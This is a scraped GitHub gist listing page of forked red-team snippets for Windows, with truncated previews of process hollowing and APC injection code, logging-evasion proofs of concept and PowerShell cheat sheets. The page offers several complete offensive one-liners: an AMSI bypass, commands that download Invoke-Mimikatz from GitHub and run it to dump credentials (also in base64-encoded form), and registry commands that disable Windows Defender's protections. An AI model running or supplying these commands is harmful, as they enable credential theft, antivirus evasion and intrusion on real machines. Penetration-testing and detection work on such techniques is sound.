PE Injection/Impersonation:
- Process Hollowing (a.k.a. RunPE)
- Process Doppelgänging
- Transacted Hollowing
- Process Ghosting
- Module Overloading & DLL Hollowing
- Chimera PE (variant of a manual PE loader)
Shellcode injection:
bopin2020
/ Hollowing.cs
Created
February 18, 2021 01:44
— forked from smgorelik/Hollowing.cs
Simple Process Hollowing C#
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*************** | |
| * Simple Process Hollowing in C# | |
| * | |
| * #Build Your Binaries | |
| * c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe | |
| * | |
| * @author: Michael Gorelik <smgorelik@gmail.com> | |
| * gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 | |
| * #Most of the code taken from here: @github: github.com/ambray |
bopin2020
/ PowerShell Red Team Cheat Sheet.txt
Created
February 18, 2021 13:12
— forked from reybango/PowerShell Red Team Cheat Sheet.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Pulled from https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70 | |
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # AMSI Bypass (Matt Graeber) | |
| Normal Version | |
| ------------------------ | |
| [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) |
bopin2020
/ Quick-Mimikatz
Created
February 18, 2021 13:18
— forked from gfoss/Quick-Mimikatz
Quick Mimikatz
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* | |
| #mimikatz [local] | |
| IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; | |
| #encoded-mimikatz [local] | |
| powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQ |
bopin2020
/ DInjectQueuerAPC.cs
Created
March 3, 2021 00:32
— forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |
bopin2020
/ disablethings.bat
Created
March 3, 2021 04:23
— forked from MHaggis/disablethings.bat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Related to MalwareBytes LazyScripter https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat | |
| reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtime |
bopin2020
/ process-hollowing.cs
Created
March 12, 2021 11:25
— forked from med0x2e/process-hollowing.cs
Process Hollowing (slightly updated to work with G2JS) - credits for the initial code go to @smgorelik and @ambray
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| namespace Hollowing | |
| { | |
| public class Loader | |
| { | |
| public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe"); |
bopin2020
/ env_var_spoofing_NGenAssemblyUsageLog_poc.cpp
Created
March 19, 2021 00:28
— forked from bohops/env_var_spoofing_NGenAssemblyUsageLog_poc.cpp
env_var_spoofing_NGenAssemblyUsageLog_poc.cpp
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // I borrowed this great POC from Adam Chester [@_xpn_] to demonstrate spoofing for evading .NET 'Usage Logging'. | |
| // This code will launch the target a suspended PowerShell.exe process, read PEB, update the ptr used to store environment variables, and resume the process | |
| // Adam's original POC and blog for evading ETW with COMPlus_ETWEnabled can be found at these URLs: | |
| // https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503 | |
| // https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/ | |
| // | |
| // Applicable detection guidance (with a few possible tweaks) can be found here: | |
| // https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3 | |
| // |
bopin2020
/ XORBruteForce.cs
Created
April 13, 2021 07:01
— forked from Flangvik/XORBruteForce.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Diagnostics; | |
| using System.Linq; | |
| using System.Text; | |
| namespace XORBruteForce | |
| { | |
| class Program | |
| { |
bopin2020
/ Get-Token.ps1
Created
May 19, 2021 09:33
— forked from vector-sec/Get-Token.ps1
PowerShell script to enumerate all Process and Thread tokens.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-Token | |
| { | |
| foreach($proc in (Get-Process)) | |
| { | |
| if($proc.Id -ne 0 -and $proc.Id -ne 4) | |
| { | |
| try | |
| { | |
| $hProcess = OpenProcess -ProcessId $proc.Id -DesiredAccess PROCESS_QUERY_LIMITED_INFORMATION | |
| } |
bopin2020
/ injection_demos.md
Created
June 19, 2021 13:18
— forked from hasherezade/injection_demos.md
List of my PE injection demos
OlderNewer